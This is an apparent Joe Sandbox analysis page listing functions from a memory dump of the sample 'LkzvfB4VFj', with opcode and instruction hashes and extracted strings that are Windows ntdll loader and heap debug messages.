                                                  • Instruction ID: 02b48467d68542e72a81abdb4e4f06ea46ceff79d54011a3655a1c6bfec6ac21
                                                  • Opcode Fuzzy Hash: 607b49dcbf34491b43daaacd7991541b54aa080186ad389761134b94d434d4aa
                                                  • Instruction Fuzzy Hash: EB41BD75604700DFEB01CF25C880B59B7B9FF40324F044DA8E416D7B92CBB9A881CB92
                                                  Function 3603ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3603EDE3
                                                  • ---------------------------------------, xrefs: 3603EDF9
                                                  • Entry Heap Size , xrefs: 3603EDED
                                                  • HEAP: , xrefs: 3603ECDD
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                  • API String ID: 3446177414-1102453626
                                                  • Opcode ID: cccaf7901d8b5eb309187de51986fd59ffa1897f751f1bbf41151dfd7fa3551f
                                                  • Instruction ID: 0fc4ea2b1f736c0e97f0315ea7c1a7f42ac1f87422b420bd0038173275a1d2d8
                                                  • Opcode Fuzzy Hash: cccaf7901d8b5eb309187de51986fd59ffa1897f751f1bbf41151dfd7fa3551f
                                                  • Instruction Fuzzy Hash: 4A419D39A12219DFD708CF19C48695ABFF6FF8535573686EAD508AB210D731EC42CB90
                                                  Function 35FBDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                  • API String ID: 3446177414-1222099010
                                                  • Opcode ID: 4a7fc059712ddeea726d04be336bab0da4f9c7937da793cd0f87b43029260988
                                                  • Instruction ID: 2243af867ba78d896462c76ecec4fa87919f10eb543a96a83eac4ebd0c650caf
                                                  • Opcode Fuzzy Hash: 4a7fc059712ddeea726d04be336bab0da4f9c7937da793cd0f87b43029260988
                                                  • Instruction Fuzzy Hash: 58315936205784EFEB16DB24C549F497BF9FF01754F054CC4E45297A61CBAAD940CB12
                                                  Function 35F99046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$@
                                                  • API String ID: 3446177414-1194432280
                                                  • Opcode ID: 8fe407aad65b6ca5a234cba62d5a555ec2d461c639456a384f66301c7a5329b4
                                                  • Instruction ID: 4c7435b92433a06d5f989ae9e96f52732453723df30c1cfd9b39a020e7d18519
                                                  • Opcode Fuzzy Hash: 8fe407aad65b6ca5a234cba62d5a555ec2d461c639456a384f66301c7a5329b4
                                                  • Instruction Fuzzy Hash: 48814AB2D042699BDB25CF54CD41BDEB7B8BB08700F0145EAA919B7290E7709E85CFA1
                                                  Function 35FC4C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • LdrpFindDllActivationContext, xrefs: 36003440, 3600346C
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 3600344A, 36003476
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 36003466
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36003439
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-3779518884
                                                  • Opcode ID: c28a301ee0b87e2b45a105b3df8b02ba79c2eb87d6977e2b1b88cb39ef7c0302
                                                  • Instruction ID: 34cc4d45409454ed83ee5362963f0a3e1830cba94d712a97f0cf2dbe7b3f610d
                                                  • Opcode Fuzzy Hash: c28a301ee0b87e2b45a105b3df8b02ba79c2eb87d6977e2b1b88cb39ef7c0302
                                                  • Instruction Fuzzy Hash: E33149B6A04B27AFF716FB04C88DE59B2A5BB10396F4288F6D90367170D7A09C80C6D5
                                                  Function 35FB237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • LdrpDynamicShimModule, xrefs: 35FFA7A5
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 35FFA79F
                                                  • apphelp.dll, xrefs: 35FB2382
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 35FFA7AF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-176724104
                                                  • Opcode ID: 259f5499a0c72712fe0343deed060afcbc5006117572d79a388e59924e86adb9
                                                  • Instruction ID: 5f9dd778740ccf3f207e16d88a136485e34b4d2b68351142a788eddb64f498a2
                                                  • Opcode Fuzzy Hash: 259f5499a0c72712fe0343deed060afcbc5006117572d79a388e59924e86adb9
                                                  • Instruction Fuzzy Hash: 2D314C76A00204EFE718DF69C882E5E7BBBFB80B50F150A59ED45B7650DBF19842CB90
                                                  Function 35F8F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 3446177414-3610490719
                                                  • Opcode ID: 55a1ec2c7937b32434e49fb35b846f51b18f3196a01b6053892633a68b714549
                                                  • Instruction ID: f007354b0199be0e88b368f04c5258501ba21e155cc1752a45da994c183d69c1
                                                  • Opcode Fuzzy Hash: 55a1ec2c7937b32434e49fb35b846f51b18f3196a01b6053892633a68b714549
                                                  • Instruction Fuzzy Hash: C2912876304741EFE316DB24CD44F2AB7AAFF84754F000C99E9559B281EB74E845CB92
                                                  Function 35FB0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Failed to allocated memory for shimmed module list, xrefs: 35FF9F1C
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 35FF9F2E
                                                  • LdrpCheckModule, xrefs: 35FF9F24
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-161242083
                                                  • Opcode ID: 5f1974782e17145305c9b3c8778e76579e432e2d5176c0ab96f0d23705e1f9a2
                                                  • Instruction ID: 7c47e379bef5849f693b39c9f0d2f34fbef415c0772c5aec4b13e0c6fb037073
                                                  • Opcode Fuzzy Hash: 5f1974782e17145305c9b3c8778e76579e432e2d5176c0ab96f0d23705e1f9a2
                                                  • Instruction Fuzzy Hash: 4C710475A04209DFEF08DF69C981AAEB7F9FB44308F04886DD906E7650E7B4AD42CB50
                                                  Function 35FCC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 360080F3
                                                  • Failed to reallocate the system dirs string !, xrefs: 360080E2
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 360080E9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1783798831
                                                  • Opcode ID: 8c05a32d2d9ccb5b1b30b452599c861b279c5132db21742cf238eb324f53212e
                                                  • Instruction ID: 36cc144192683f7fd8b2b9184775381d6dcc04963ca410d79658e27db7239247
                                                  • Opcode Fuzzy Hash: 8c05a32d2d9ccb5b1b30b452599c861b279c5132db21742cf238eb324f53212e
                                                  • Instruction Fuzzy Hash: 694104B6614309ABD714DB64CD42B4B7BF9BF54750F010C6AF9A8A3250EB74D811CB92
                                                  Function 360143D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36014508
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 36014519
                                                  • LdrpCheckRedirection, xrefs: 3601450F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 3446177414-3154609507
                                                  • Opcode ID: 50606ecadc86cd8af1cd8312bf05bd63fe58b6229b54cf7b0bd60d2f1e16a091
                                                  • Instruction ID: 73f69494a9ddb32296fdfc18e2d093e810ed206b7af3ef9a4b1bce43c9411b44
                                                  • Opcode Fuzzy Hash: 50606ecadc86cd8af1cd8312bf05bd63fe58b6229b54cf7b0bd60d2f1e16a091
                                                  • Instruction Fuzzy Hash: 7D41D37EA053219FDB10CF59C942A1A7FE5BF48794F0606E9ED48AB261D730D800CBE1
                                                  Function 36015B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Wow64 Emulation Layer
                                                  • API String ID: 3446177414-921169906
                                                  • Opcode ID: 552a85ac89287e7988b476de8a85a0e67b93133a4a02a1d18446f55f96100b49
                                                  • Instruction ID: 12d91f40e6ac5ee3fabafa5f8da873c80dc587c1babf8a999e5df13d4092abca
                                                  • Opcode Fuzzy Hash: 552a85ac89287e7988b476de8a85a0e67b93133a4a02a1d18446f55f96100b49
                                                  • Instruction Fuzzy Hash: 6E212CB6A0015DBFAB01ABA5CD89CFF7B7DEF44699B010894FA15A6100E7319E01DB71
                                                  Function 35FBEE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 558139086ef14e3e2c3d10787bddfad4ecdd7fad6e06ccff0e8dec786636e219
                                                  • Instruction ID: 3bd30f436e363d188fcd5d42e1db7d9dde26d1040be55658a9c12174f1068e8e
                                                  • Opcode Fuzzy Hash: 558139086ef14e3e2c3d10787bddfad4ecdd7fad6e06ccff0e8dec786636e219
                                                  • Instruction Fuzzy Hash: 19E1ED75E00708DFDF25CFAAC980A8DBBF5BF48344F20492AE546A7664DBB1A941CF10
                                                  Function 3600EBD0 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: eefc4c75fab2827a831fae7ef95fa79956b3abd131ffb9f2926249ea2beb9f18
                                                  • Instruction ID: 17d24338470390f98c84199c7adfdac48e829f78ac74e115b973db88aef66dc9
                                                  • Opcode Fuzzy Hash: eefc4c75fab2827a831fae7ef95fa79956b3abd131ffb9f2926249ea2beb9f18
                                                  • Instruction Fuzzy Hash: 44714575E002299FEF04CFA9D982ADDBBB5FF48314F1484AADA05BB241D735A906CF50
                                                  Function 3606A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: e916d4e2844276b4e87cfe8be568816344a7ba43a9dbf3ee34c9c018d2461cdb
                                                  • Instruction ID: 1b5116a8eba360c7c143f2c9673691ab115a0643a8f7f709058bcfceb2e27439
                                                  • Opcode Fuzzy Hash: e916d4e2844276b4e87cfe8be568816344a7ba43a9dbf3ee34c9c018d2461cdb
                                                  • Instruction Fuzzy Hash: 6B517274B146229FFB08EE1AC8926197BE1FF89358B1041ADD906EB711DBB5EC41CB80
                                                  Function 3600EE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 9827a991b998c0f5abbad7d03ab22c1c1603410984bbd3091f408770c367f175
                                                  • Instruction ID: 01f9d00ff8e72c48e552abdb1bafa7a632edad168bdd6ce7a569c8ca40cb2b61
                                                  • Opcode Fuzzy Hash: 9827a991b998c0f5abbad7d03ab22c1c1603410984bbd3091f408770c367f175
                                                  • Instruction Fuzzy Hash: E25154B5E002189FEF04CF9AD842ADDBBF6BF48354F14806AE905BB250EB349941CF50
                                                  Function 35FC7A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                  • String ID:
                                                  • API String ID: 4281723722-0
                                                  • Opcode ID: f70ebb0b816cdf773a38532d2dd6d81837cdbc64fe761a2c45e21e4b75f5ef60
                                                  • Instruction ID: 5f5bdabb5278ccd9d1761b8be469a41ad6cbdcfae6a813f7e15c6eb17d6b8bf7
                                                  • Opcode Fuzzy Hash: f70ebb0b816cdf773a38532d2dd6d81837cdbc64fe761a2c45e21e4b75f5ef60
                                                  • Instruction Fuzzy Hash: 10314775E00219EFDF05DFA8C846A9DBBF1FB48710F1045AAE911B7280CB319901CFA4
                                                  Function 35F958E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: c92930c1bffb529d05410b0e665db3c233f3c503e8084a8434db2898df5bb99c
                                                  • Instruction ID: 19345b25982f977cd75ae4254366e118ce821faccc4cdb3ff57b2e9643712ca9
                                                  • Opcode Fuzzy Hash: c92930c1bffb529d05410b0e665db3c233f3c503e8084a8434db2898df5bb99c
                                                  • Instruction Fuzzy Hash: 95327975E04729CFEB29CF64C844BE9BBB5BF08304F0048E9D509A7651DBB59A84CF91
                                                  Function 35FC4B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$Flst
                                                  • API String ID: 0-758220159
                                                  • Opcode ID: 7cd9c0c060263c2916053a99d9ef24ea2b841ecdc4a8e6b0b68bd58f2e159d29
                                                  • Instruction ID: ad08c667add6399b902e97f6c3c4a94093f99e4ee4984bb57a4998f4e99b79ba
                                                  • Opcode Fuzzy Hash: 7cd9c0c060263c2916053a99d9ef24ea2b841ecdc4a8e6b0b68bd58f2e159d29
                                                  • Instruction Fuzzy Hash: FC519EB5E00B0A8FEB25DF95C488B5DFBF5FF44755F1488A9D0469B250DBB09981CB80
                                                  Function 35F90485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 35F90586
                                                  • kLsE, xrefs: 35F905FE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 3446177414-2547482624
                                                  • Opcode ID: 37231a020fd8438a2570628eae5a1c72c3d9716a47fb1397edbf5ea626297520
                                                  • Instruction ID: 0ddda74791f33413c0795988024c0b26bd251bed35200c0996bcc83168a2687f
                                                  • Opcode Fuzzy Hash: 37231a020fd8438a2570628eae5a1c72c3d9716a47fb1397edbf5ea626297520
                                                  • Instruction Fuzzy Hash: 32515DB6A04B46DBEB18DFA5C440AEAB7FDAF44304F004C2ED696D7240EB749545CB61
                                                  Function 35F8DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 0$0
                                                  • API String ID: 3446177414-203156872
                                                  • Opcode ID: e91e48a8a53aa31b21edcd14933eb49239efcfb5f65c64e75cbd6afc36f34673
                                                  • Instruction ID: c221e57cb6aa07e07fbc06a32f13b16f87eb36d9b37471274f3ef237a1b5c700
                                                  • Opcode Fuzzy Hash: e91e48a8a53aa31b21edcd14933eb49239efcfb5f65c64e75cbd6afc36f34673
                                                  • Instruction Fuzzy Hash: 634159B66087059FD300CF28C484A5ABBE9BF89354F054A6EF988DB341D771EA05CB96